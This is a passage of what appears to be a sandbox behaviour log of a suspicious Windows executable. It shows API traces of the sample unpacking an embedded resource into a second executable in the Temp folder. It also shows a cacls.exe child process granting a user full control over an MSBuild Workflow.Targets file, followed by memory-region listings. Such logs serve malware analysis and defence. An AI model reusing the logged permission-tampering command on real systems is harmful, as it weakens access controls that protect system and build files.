lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0266.932] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0266.932] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0266.932] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x01\x28\xab\x1c\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0266.932] GetLastError () returned 0x0 [0266.932] SetLastError (dwErrCode=0x0) [0266.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0266.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0266.933] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0266.933] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0266.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x01\x28\xab\x1c\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0266.933] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0266.933] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0266.933] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0266.933] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0266.933] GetCurrentProcess () returned 0xffffffff [0266.933] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0266.933] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0267.076] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0267.076] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0267.076] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0267.076] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0267.076] LockResource (hResData=0x43c648) returned 0x43c648 [0267.076] GetCurrentPackageId () returned 0x3d54 [0267.076] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0267.077] GetLastError () returned 0x20 [0267.077] GetLastError () returned 0x20 [0267.077] SetLastError (dwErrCode=0x20) [0267.077] GetLastError () returned 0x20 [0267.077] SetLastError (dwErrCode=0x20) [0267.077] GetLastError () returned 0x20 [0267.077] SetLastError (dwErrCode=0x20) [0267.077] GetLastError () returned 0x20 [0267.077] SetLastError (dwErrCode=0x20) [0267.077] GetLastError () returned 0x20 [0267.077] SetLastError (dwErrCode=0x20) [0267.077] GetLastError () returned 0x20 [0267.077] SetLastError (dwErrCode=0x20) [0267.077] WriteFile (in: hFile=0xc0, lpBuffer=0x19ea00*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e32c, lpOverlapped=0x0 | out: lpBuffer=0x19ea00*, lpNumberOfBytesWritten=0x19e32c*=0x49, lpOverlapped=0x0) returned 1 [0267.078] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0267.078] ExitProcess (uExitCode=0x1) Thread: id = 852 os_tid = 0x75c Process: id = "93" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x2cb2f000" os_pid = "0x550" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0xec4" cmd_line = "cacls \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6793 start_va = 0xa70000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 6794 start_va = 0xa90000 end_va = 0xa91fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 6795 start_va = 0xaa0000 end_va = 0xab3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 6796 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 6797 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 6798 start_va = 0xb40000 end_va = 0xb43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 6799 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 6800 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 6801 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6802 start_va = 0x7ee00000 end_va = 0x7ee22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee00000" filename = "" Region: id = 6803 start_va = 0x7ee23000 end_va = 0x7ee23fff entry_point = 0x0 region_type = private name = "private_0x000000007ee23000" filename = "" Region: id = 6804 start_va = 0x7ee2b000 end_va = 0x7ee2bfff entry_point = 0x0 region_type = private name = "private_0x000000007ee2b000" filename = "" Region: id = 6805 start_va = 0x7ee2d000 end_va = 0x7ee2ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee2d000" filename = "" Region: id = 6806 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6807 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6808 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 6809 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6810 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 6811 start_va = 0xb50000 end_va = 0xb50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 6812 start_va = 0xb60000 end_va = 0xb61fff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 6886 start_va = 0xc80000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 6887 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6888 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6889 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6890 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6891 start_va = 0x4d80000 end_va = 0x4ebffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 6892 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6893 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6894 start_va = 0xa70000 end_va = 0xa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 6895 start_va = 0x7ed00000 end_va = 0x7edfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed00000" filename = "" Region: id = 6987 start_va = 0xb70000 end_va = 0xc2dfff entry_point = 0xb70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6988 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6989 start_va = 0xc30000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 6990 start_va = 0xc90000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 6991 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6992 start_va = 0x7ee28000 end_va = 0x7ee2afff entry_point = 0x0 region_type = private name = "private_0x000000007ee28000" filename = "" Region: id = 6993 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6994 start_va = 0x772c0000 end_va = 